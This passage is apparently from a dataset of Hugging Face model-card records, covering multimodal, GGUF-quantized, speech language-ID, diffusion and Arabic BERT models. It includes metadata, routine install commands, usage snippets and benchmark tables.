model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
+ load_in_4bit=True
)
```
#### Use Flash-Attention 2 to further speed-up generation
First make sure to install `flash-attn`. Refer to the [original repository of Flash Attention](https://github.com/Dao-AILab/flash-attention) regarding that package installation. Simply change the snippet above with:
```diff
model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
+ use_flash_attention_2=True
).to(0)
```
## 🔒 License
Llama 2 is licensed under the LLAMA 2 Community License,
Copyright (c) Meta Platforms, Inc. All Rights Reserved.
## ✏️ Citation
If you find our paper and code useful in your research:
```BibTeX
@misc{zhang2024llavanextvideo,
title={LLaVA-NeXT: A Strong Zero-shot Video Understanding Model},
url={https://llava-vl.github.io/blog/2024-04-30-llava-next-video/},
author={Zhang, Yuanhan and Li, Bo and Liu, haotian and Lee, Yong jae and Gui, Liangke and Fu, Di and Feng, Jiashi and Liu, Ziwei and Li, Chunyuan},
month={April},
year={2024}
}
```
```BibTeX
@misc{liu2024llavanext,
title={LLaVA-NeXT: Improved reasoning, OCR, and world knowledge},
url={https://llava-vl.github.io/blog/2024-01-30-llava-next/},
author={Liu, Haotian and Li, Chunyuan and Li, Yuheng and Li, Bo and Zhang, Yuanhan and Shen, Sheng and Lee, Yong Jae},
month={January},
year={2024}
}
``` |
mradermacher/SwedishBeagle-dareDPO-GGUF | mradermacher | "2024-06-03T04:48:42Z" | 3,583 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:FredrikBL/SwedishBeagle-dareDPO",
"endpoints_compatible",
"region:us"
] | null | "2024-06-03T04:22:27Z" | ---
base_model: FredrikBL/SwedishBeagle-dareDPO
language:
- en
library_name: transformers
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FredrikBL/SwedishBeagle-dareDPO
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
facebook/mms-lid-126 | facebook | "2023-06-13T10:15:48Z" | 3,582 | 24 | transformers | [
"transformers",
"pytorch",
"safetensors",
"wav2vec2",
"audio-classification",
"mms",
"ab",
"af",
"ak",
"am",
"ar",
"as",
"av",
"ay",
"az",
"ba",
"bm",
"be",
"bn",
"bi",
"bo",
"sh",
"br",
"bg",
"ca",
"cs",
"ce",
"cv",
"ku",
"cy",
"da",
"de",
"dv",
"dz",
"el",
"en",
"eo",
"et",
"eu",
"ee",
"fo",
"fa",
"fj",
"fi",
"fr",
"fy",
"ff",
"ga",
"gl",
"gn",
"gu",
"zh",
"ht",
"ha",
"he",
"hi",
"hu",
"hy",
"ig",
"ia",
"ms",
"is",
"it",
"jv",
"ja",
"kn",
"ka",
"kk",
"kr",
"km",
"ki",
"rw",
"ky",
"ko",
"kv",
"lo",
"la",
"lv",
"ln",
"lt",
"lb",
"lg",
"mh",
"ml",
"mr",
"mk",
"mg",
"mt",
"mn",
"mi",
"my",
"nl",
"no",
"ne",
"ny",
"oc",
"om",
"or",
"os",
"pa",
"pl",
"pt",
"ps",
"qu",
"ro",
"rn",
"ru",
"sg",
"sk",
"sl",
"sm",
"sn",
"sd",
"so",
"es",
"sq",
"su",
"sv",
"sw",
"ta",
"tt",
"te",
"tg",
"tl",
"th",
"ti",
"ts",
"tr",
"uk",
"vi",
"wo",
"xh",
"yo",
"zu",
"za",
"dataset:google/fleurs",
"arxiv:2305.13516",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | audio-classification | "2023-06-13T08:44:05Z" | ---
tags:
- mms
language:
- ab
- af
- ak
- am
- ar
- as
- av
- ay
- az
- ba
- bm
- be
- bn
- bi
- bo
- sh
- br
- bg
- ca
- cs
- ce
- cv
- ku
- cy
- da
- de
- dv
- dz
- el
- en
- eo
- et
- eu
- ee
- fo
- fa
- fj
- fi
- fr
- fy
- ff
- ga
- gl
- gn
- gu
- zh
- ht
- ha
- he
- hi
- sh
- hu
- hy
- ig
- ia
- ms
- is
- it
- jv
- ja
- kn
- ka
- kk
- kr
- km
- ki
- rw
- ky
- ko
- kv
- lo
- la
- lv
- ln
- lt
- lb
- lg
- mh
- ml
- mr
- ms
- mk
- mg
- mt
- mn
- mi
- my
- zh
- nl
- 'no'
- 'no'
- ne
- ny
- oc
- om
- or
- os
- pa
- pl
- pt
- ms
- ps
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- ro
- rn
- ru
- sg
- sk
- sl
- sm
- sn
- sd
- so
- es
- sq
- su
- sv
- sw
- ta
- tt
- te
- tg
- tl
- th
- ti
- ts
- tr
- uk
- ms
- vi
- wo
- xh
- ms
- yo
- ms
- zu
- za
license: cc-by-nc-4.0
datasets:
- google/fleurs
metrics:
- acc
---
# Massively Multilingual Speech (MMS) - Finetuned LID
This checkpoint is a model fine-tuned for speech language identification (LID) and part of Facebook's [Massive Multilingual Speech project](https://research.facebook.com/publications/scaling-speech-technology-to-1000-languages/).
This checkpoint is based on the [Wav2Vec2 architecture](https://huggingface.co/docs/transformers/model_doc/wav2vec2) and classifies raw audio input to a probability distribution over 126 output classes (each class representing a language).
The checkpoint consists of **1 billion parameters** and has been fine-tuned from [facebook/mms-1b](https://huggingface.co/facebook/mms-1b) on 126 languages.
## Table Of Content
- [Example](#example)
- [Supported Languages](#supported-languages)
- [Model details](#model-details)
- [Additional links](#additional-links)
## Example
This MMS checkpoint can be used with [Transformers](https://github.com/huggingface/transformers) to identify
the spoken language of an audio. It can recognize the [following 126 languages](#supported-languages).
Let's look at a simple example.
First, we install transformers and some other libraries
```
pip install torch accelerate torchaudio datasets
pip install --upgrade transformers
````
**Note**: In order to use MMS you need to have at least `transformers >= 4.30` installed. If the `4.30` version
is not yet available [on PyPI](https://pypi.org/project/transformers/) make sure to install `transformers` from
source:
```
pip install git+https://github.com/huggingface/transformers.git
```
Next, we load a couple of audio samples via `datasets`. Make sure that the audio data is sampled to 16000 kHz.
```py
from datasets import load_dataset, Audio
# English
stream_data = load_dataset("mozilla-foundation/common_voice_13_0", "en", split="test", streaming=True)
stream_data = stream_data.cast_column("audio", Audio(sampling_rate=16000))
en_sample = next(iter(stream_data))["audio"]["array"]
# Arabic
stream_data = load_dataset("mozilla-foundation/common_voice_13_0", "ar", split="test", streaming=True)
stream_data = stream_data.cast_column("audio", Audio(sampling_rate=16000))
ar_sample = next(iter(stream_data))["audio"]["array"]
```
Next, we load the model and processor
```py
from transformers import Wav2Vec2ForSequenceClassification, AutoFeatureExtractor
import torch
model_id = "facebook/mms-lid-126"
processor = AutoFeatureExtractor.from_pretrained(model_id)
model = Wav2Vec2ForSequenceClassification.from_pretrained(model_id)
```
Now we process the audio data, pass the processed audio data to the model to classify it into a language, just like we usually do for Wav2Vec2 audio classification models such as [ehcalabres/wav2vec2-lg-xlsr-en-speech-emotion-recognition](https://huggingface.co/harshit345/xlsr-wav2vec-speech-emotion-recognition)
```py
# English
inputs = processor(en_sample, sampling_rate=16_000, return_tensors="pt")
with torch.no_grad():
outputs = model(**inputs).logits
lang_id = torch.argmax(outputs, dim=-1)[0].item()
detected_lang = model.config.id2label[lang_id]
# 'eng'
# Arabic
inputs = processor(ar_sample, sampling_rate=16_000, return_tensors="pt")
with torch.no_grad():
outputs = model(**inputs).logits
lang_id = torch.argmax(outputs, dim=-1)[0].item()
detected_lang = model.config.id2label[lang_id]
# 'ara'
```
To see all the supported languages of a checkpoint, you can print out the language ids as follows:
```py
processor.id2label.values()
```
For more details, about the architecture please have a look at [the official docs](https://huggingface.co/docs/transformers/main/en/model_doc/mms).
## Supported Languages
This model supports 126 languages. Unclick the following to toogle all supported languages of this checkpoint in [ISO 639-3 code](https://en.wikipedia.org/wiki/ISO_639-3).
You can find more details about the languages and their ISO 649-3 codes in the [MMS Language Coverage Overview](https://dl.fbaipublicfiles.com/mms/misc/language_coverage_mms.html).
<details>
<summary>Click to toggle</summary>
- ara
- cmn
- eng
- spa
- fra
- mlg
- swe
- por
- vie
- ful
- sun
- asm
- ben
- zlm
- kor
- ind
- hin
- tuk
- urd
- aze
- slv
- mon
- hau
- tel
- swh
- bod
- rus
- tur
- heb
- mar
- som
- tgl
- tat
- tha
- cat
- ron
- mal
- bel
- pol
- yor
- nld
- bul
- hat
- afr
- isl
- amh
- tam
- hun
- hrv
- lit
- cym
- fas
- mkd
- ell
- bos
- deu
- sqi
- jav
- nob
- uzb
- snd
- lat
- nya
- grn
- mya
- orm
- lin
- hye
- yue
- pan
- jpn
- kaz
- npi
- kat
- guj
- kan
- tgk
- ukr
- ces
- lav
- bak
- khm
- fao
- glg
- ltz
- lao
- mlt
- sin
- sna
- ita
- srp
- mri
- nno
- pus
- eus
- ory
- lug
- bre
- luo
- slk
- fin
- dan
- yid
- est
- ceb
- war
- san
- kir
- oci
- wol
- haw
- kam
- umb
- xho
- epo
- zul
- ibo
- abk
- ckb
- nso
- gle
- kea
- ast
- sco
- glv
- ina
</details>
## Model details
- **Developed by:** Vineel Pratap et al.
- **Model type:** Multi-Lingual Automatic Speech Recognition model
- **Language(s):** 126 languages, see [supported languages](#supported-languages)
- **License:** CC-BY-NC 4.0 license
- **Num parameters**: 1 billion
- **Audio sampling rate**: 16,000 kHz
- **Cite as:**
@article{pratap2023mms,
title={Scaling Speech Technology to 1,000+ Languages},
author={Vineel Pratap and Andros Tjandra and Bowen Shi and Paden Tomasello and Arun Babu and Sayani Kundu and Ali Elkahky and Zhaoheng Ni and Apoorv Vyas and Maryam Fazel-Zarandi and Alexei Baevski and Yossi Adi and Xiaohui Zhang and Wei-Ning Hsu and Alexis Conneau and Michael Auli},
journal={arXiv},
year={2023}
}
## Additional Links
- [Blog post](https://ai.facebook.com/blog/multilingual-model-speech-recognition/)
- [Transformers documentation](https://huggingface.co/docs/transformers/main/en/model_doc/mms).
- [Paper](https://arxiv.org/abs/2305.13516)
- [GitHub Repository](https://github.com/facebookresearch/fairseq/tree/main/examples/mms#asr)
- [Other **MMS** checkpoints](https://huggingface.co/models?other=mms)
- MMS base checkpoints:
- [facebook/mms-1b](https://huggingface.co/facebook/mms-1b)
- [facebook/mms-300m](https://huggingface.co/facebook/mms-300m)
- [Official Space](https://huggingface.co/spaces/facebook/MMS)
|
digiplay/7pa-VAE | digiplay | "2024-05-22T07:49:24Z" | 3,582 | 3 | diffusers | [
"diffusers",
"safetensors",
"license:other",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2024-05-21T10:24:30Z" | ---
license: other
---
Model info:
Author : LotusSnacks
https://civitai.com/models/13468?modelVersionId=15869
this version baked 84000VAE
NoVAE version:
AIARTCHAN/7pa
https://huggingface.co/AIARTCHAN/7pa
Other model from the Author:
[CoffewithLotus]
https://tensor.art/models/701383986661892674
Sample prompt and image generated by Huggingface's API :
1girl ultra-detailed outdoor 4k masterpiece, clear lines,

sky Angel wings 4k 8k masterpiece realistic light rainbow paint outerspace stars

|
lenssssw/roblox-clothing-ai-maker | lenssssw | "2023-11-04T23:22:00Z" | 3,581 | 5 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-03-11T15:40:28Z" | ---
license: creativeml-openrail-m
tags:
- text-to-image
- stable-diffusion
---
THIS MODEL NO LONGER GIVES THE SAME RESULTS AS IT USED TO (shown below)
Sample Images:
clothing template with a shirt red and a tie blue:

clothing template with a suit golden:

clothing template with a shirt beige PHOTOREALISTIC:
 |
Emilio407/dolphin-2.9.2-qwen2-7b-GGUF | Emilio407 | "2024-06-22T04:48:53Z" | 3,581 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-06T22:26:27Z" | Entry not found |
CAMeL-Lab/bert-base-arabic-camelbert-mix | CAMeL-Lab | "2021-09-14T14:34:32Z" | 3,579 | 11 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"fill-mask",
"Arabic",
"Dialect",
"Egyptian",
"Gulf",
"Levantine",
"Classical Arabic",
"MSA",
"Modern Standard Arabic",
"ar",
"arxiv:2103.06678",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:04Z" | ---
language:
- ar
license: apache-2.0
tags:
- Arabic
- Dialect
- Egyptian
- Gulf
- Levantine
- Classical Arabic
- MSA
- Modern Standard Arabic
widget:
- text: "الهدف من الحياة هو [MASK] ."
---
# CAMeLBERT: A collection of pre-trained models for Arabic NLP tasks
## Model description
**CAMeLBERT** is a collection of BERT models pre-trained on Arabic texts with different sizes and variants.
We release pre-trained language models for Modern Standard Arabic (MSA), dialectal Arabic (DA), and classical Arabic (CA), in addition to a model pre-trained on a mix of the three.
We also provide additional models that are pre-trained on a scaled-down set of the MSA variant (half, quarter, eighth, and sixteenth).
The details are described in the paper *"[The Interplay of Variant, Size, and Task Type in Arabic Pre-trained Language Models](https://arxiv.org/abs/2103.06678)."*
This model card describes **CAMeLBERT-Mix** (`bert-base-arabic-camelbert-mix`), a model pre-trained on a mixture of these variants: MSA, DA, and CA.
||Model|Variant|Size|#Word|
|-|-|:-:|-:|-:|
|✔|`bert-base-arabic-camelbert-mix`|CA,DA,MSA|167GB|17.3B|
||`bert-base-arabic-camelbert-ca`|CA|6GB|847M|
||`bert-base-arabic-camelbert-da`|DA|54GB|5.8B|
||`bert-base-arabic-camelbert-msa`|MSA|107GB|12.6B|
||`bert-base-arabic-camelbert-msa-half`|MSA|53GB|6.3B|
||`bert-base-arabic-camelbert-msa-quarter`|MSA|27GB|3.1B|
||`bert-base-arabic-camelbert-msa-eighth`|MSA|14GB|1.6B|
||`bert-base-arabic-camelbert-msa-sixteenth`|MSA|6GB|746M|
## Intended uses
You can use the released model for either masked language modeling or next sentence prediction.
However, it is mostly intended to be fine-tuned on an NLP task, such as NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
We release our fine-tuninig code [here](https://github.com/CAMeL-Lab/CAMeLBERT).
#### How to use
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='CAMeL-Lab/bert-base-arabic-camelbert-mix')
>>> unmasker("الهدف من الحياة هو [MASK] .")
[{'sequence': '[CLS] الهدف من الحياة هو النجاح. [SEP]',
'score': 0.10861027985811234,
'token': 6232,
'token_str': 'النجاح'},
{'sequence': '[CLS] الهدف من الحياة هو.. [SEP]',
'score': 0.07626965641975403,
'token': 18,
'token_str': '.'},
{'sequence': '[CLS] الهدف من الحياة هو الحياة. [SEP]',
'score': 0.05131986364722252,
'token': 3696,
'token_str': 'الحياة'},
{'sequence': '[CLS] الهدف من الحياة هو الموت. [SEP]',
'score': 0.03734956309199333,
'token': 4295,
'token_str': 'الموت'},
{'sequence': '[CLS] الهدف من الحياة هو العمل. [SEP]',
'score': 0.027189988642930984,
'token': 2854,
'token_str': 'العمل'}]
```
*Note*: to download our models, you would need `transformers>=3.5.0`. Otherwise, you could download the models manually.
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
model = AutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
```
and in TensorFlow:
```python
from transformers import AutoTokenizer, TFAutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
model = TFAutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='tf')
output = model(encoded_input)
```
## Training data
- MSA (Modern Standard Arabic)
- [The Arabic Gigaword Fifth Edition](https://catalog.ldc.upenn.edu/LDC2011T11)
- [Abu El-Khair Corpus](http://www.abuelkhair.net/index.php/en/arabic/abu-el-khair-corpus)
- [OSIAN corpus](https://vlo.clarin.eu/search;jsessionid=31066390B2C9E8C6304845BA79869AC1?1&q=osian)
- [Arabic Wikipedia](https://archive.org/details/arwiki-20190201)
- The unshuffled version of the Arabic [OSCAR corpus](https://oscar-corpus.com/)
- DA (dialectal Arabic)
- A collection of dialectal Arabic data described in [our paper](https://arxiv.org/abs/2103.06678).
- CA (classical Arabic)
- [OpenITI (Version 2020.1.2)](https://zenodo.org/record/3891466#.YEX4-F0zbzc)
## Training procedure
We use [the original implementation](https://github.com/google-research/bert) released by Google for pre-training.
We follow the original English BERT model's hyperparameters for pre-training, unless otherwise specified.
### Preprocessing
- After extracting the raw text from each corpus, we apply the following pre-processing.
- We first remove invalid characters and normalize white spaces using the utilities provided by [the original BERT implementation](https://github.com/google-research/bert/blob/eedf5716ce1268e56f0a50264a88cafad334ac61/tokenization.py#L286-L297).
- We also remove lines without any Arabic characters.
- We then remove diacritics and kashida using [CAMeL Tools](https://github.com/CAMeL-Lab/camel_tools).
- Finally, we split each line into sentences with a heuristics-based sentence segmenter.
- We train a WordPiece tokenizer on the entire dataset (167 GB text) with a vocabulary size of 30,000 using [HuggingFace's tokenizers](https://github.com/huggingface/tokenizers).
- We do not lowercase letters nor strip accents.
### Pre-training
- The model was trained on a single cloud TPU (`v3-8`) for one million steps in total.
- The first 90,000 steps were trained with a batch size of 1,024 and the rest was trained with a batch size of 256.
- The sequence length was limited to 128 tokens for 90% of the steps and 512 for the remaining 10%.
- We use whole word masking and a duplicate factor of 10.
- We set max predictions per sequence to 20 for the dataset with max sequence length of 128 tokens and 80 for the dataset with max sequence length of 512 tokens.
- We use a random seed of 12345, masked language model probability of 0.15, and short sequence probability of 0.1.
- The optimizer used is Adam with a learning rate of 1e-4, \\(\beta_{1} = 0.9\\) and \\(\beta_{2} = 0.999\\), a weight decay of 0.01, learning rate warmup for 10,000 steps and linear decay of the learning rate after.
## Evaluation results
- We evaluate our pre-trained language models on five NLP tasks: NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
- We fine-tune and evaluate the models using 12 dataset.
- We used Hugging Face's transformers to fine-tune our CAMeLBERT models.
- We used transformers `v3.1.0` along with PyTorch `v1.5.1`.
- The fine-tuning was done by adding a fully connected linear layer to the last hidden state.
- We use \\(F_{1}\\) score as a metric for all tasks.
- Code used for fine-tuning is available [here](https://github.com/CAMeL-Lab/CAMeLBERT).
### Results
| Task | Dataset | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | --------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| NER | ANERcorp | MSA | 80.8% | 67.9% | 74.1% | 82.4% | 82.0% | 82.1% | 82.6% | 80.8% |
| POS | PATB (MSA) | MSA | 98.1% | 97.8% | 97.7% | 98.3% | 98.2% | 98.3% | 98.2% | 98.2% |
| | ARZTB (EGY) | DA | 93.6% | 92.3% | 92.7% | 93.6% | 93.6% | 93.7% | 93.6% | 93.6% |
| | Gumar (GLF) | DA | 97.3% | 97.7% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% |
| SA | ASTD | MSA | 76.3% | 69.4% | 74.6% | 76.9% | 76.0% | 76.8% | 76.7% | 75.3% |
| | ArSAS | MSA | 92.7% | 89.4% | 91.8% | 93.0% | 92.6% | 92.5% | 92.5% | 92.3% |
| | SemEval | MSA | 69.0% | 58.5% | 68.4% | 72.1% | 70.7% | 72.8% | 71.6% | 71.2% |
| DID | MADAR-26 | DA | 62.9% | 61.9% | 61.8% | 62.6% | 62.0% | 62.8% | 62.0% | 62.2% |
| | MADAR-6 | DA | 92.5% | 91.5% | 92.2% | 91.9% | 91.8% | 92.2% | 92.1% | 92.0% |
| | MADAR-Twitter-5 | MSA | 75.7% | 71.4% | 74.2% | 77.6% | 78.5% | 77.3% | 77.7% | 76.2% |
| | NADI | DA | 24.7% | 17.3% | 20.1% | 24.9% | 24.6% | 24.6% | 24.9% | 23.8% |
| Poetry | APCD | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
### Results (Average)
| | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| Variant-wise-average<sup>[[1]](#footnote-1)</sup> | MSA | 82.1% | 75.7% | 80.1% | 83.4% | 83.0% | 83.3% | 83.2% | 82.3% |
| | DA | 74.4% | 72.1% | 72.9% | 74.2% | 74.0% | 74.3% | 74.1% | 73.9% |
| | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
| Macro-Average | ALL | 78.7% | 74.7% | 77.1% | 79.2% | 79.0% | 79.2% | 79.1% | 78.6% |
<a name="footnote-1">[1]</a>: Variant-wise-average refers to average over a group of tasks in the same language variant.
## Acknowledgements
This research was supported with Cloud TPUs from Google’s TensorFlow Research Cloud (TFRC).
## Citation
```bibtex
@inproceedings{inoue-etal-2021-interplay,
title = "The Interplay of Variant, Size, and Task Type in {A}rabic Pre-trained Language Models",
author = "Inoue, Go and
Alhafni, Bashar and
Baimukan, Nurpeiis and
Bouamor, Houda and
Habash, Nizar",
booktitle = "Proceedings of the Sixth Arabic Natural Language Processing Workshop",
month = apr,
year = "2021",
address = "Kyiv, Ukraine (Online)",
publisher = "Association for Computational Linguistics",
abstract = "In this paper, we explore the effects of language variants, data sizes, and fine-tuning task types in Arabic pre-trained language models. To do so, we build three pre-trained language models across three variants of Arabic: Modern Standard Arabic (MSA), dialectal Arabic, and classical Arabic, in addition to a fourth language model which is pre-trained on a mix of the three. We also examine the importance of pre-training data size by building additional models that are pre-trained on a scaled-down set of the MSA variant. We compare our different models to each other, as well as to eight publicly available models by fine-tuning them on five NLP tasks spanning 12 datasets. Our results suggest that the variant proximity of pre-training data to fine-tuning data is more important than the pre-training data size. We exploit this insight in defining an optimized system selection model for the studied tasks.",
}
```
|
NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF | NikolayKozloff | "2024-06-30T17:06:50Z" | 3,579 | 1 | null | [
"gguf",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:Sao10K/Fimbulvetr-11B-v2.1-16K",
"license:cc-by-nc-4.0",
"region:us"
] | null | "2024-06-30T17:06:20Z" | ---
base_model: Sao10K/Fimbulvetr-11B-v2.1-16K
language:
- en
license: cc-by-nc-4.0
tags:
- llama-cpp
- gguf-my-repo
---
# NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF
This model was converted to GGUF format from [`Sao10K/Fimbulvetr-11B-v2.1-16K`](https://huggingface.co/Sao10K/Fimbulvetr-11B-v2.1-16K) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/Sao10K/Fimbulvetr-11B-v2.1-16K) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -c 2048
```
|
LLM360/CrystalChat | LLM360 | "2024-06-17T19:30:17Z" | 3,578 | 35 | transformers | [
"transformers",
"pytorch",
"crystalcoder",
"text-generation",
"llm",
"code",
"custom_code",
"en",
"dataset:openaccess-ai-collective/oasst1-guanaco-extended-sharegpt",
"dataset:Open-Orca/SlimOrca",
"dataset:AtAndDev/ShareGPT-Vicuna-v3-cleaned-unfiltered",
"dataset:WizardLM/WizardLM_evol_instruct_V2_196k",
"dataset:winglian/chatlogs-en-cleaned",
"dataset:HuggingFaceH4/CodeAlpaca_20K",
"dataset:theblackcat102/evol-codealpaca-v1",
"dataset:nickrosh/Evol-Instruct-Code-80k-v1",
"dataset:open-phi/textbooks",
"dataset:open-phi/programming_books_llama",
"dataset:LLM360/CrystalCoderDatasets",
"arxiv:2312.06550",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"region:us"
] | text-generation | "2024-01-08T18:53:29Z" | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
library_name: transformers
widget:
- example_title: Explain the name of CrystalChat
text: >-
<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed
and long answer. <|sys_end|> <|im_start|> Give me a one-sentence description of crystal. And tell me what
might the name "Crystal" mean for a transparant and open-source language model? <|im_end|>
output:
text: >-
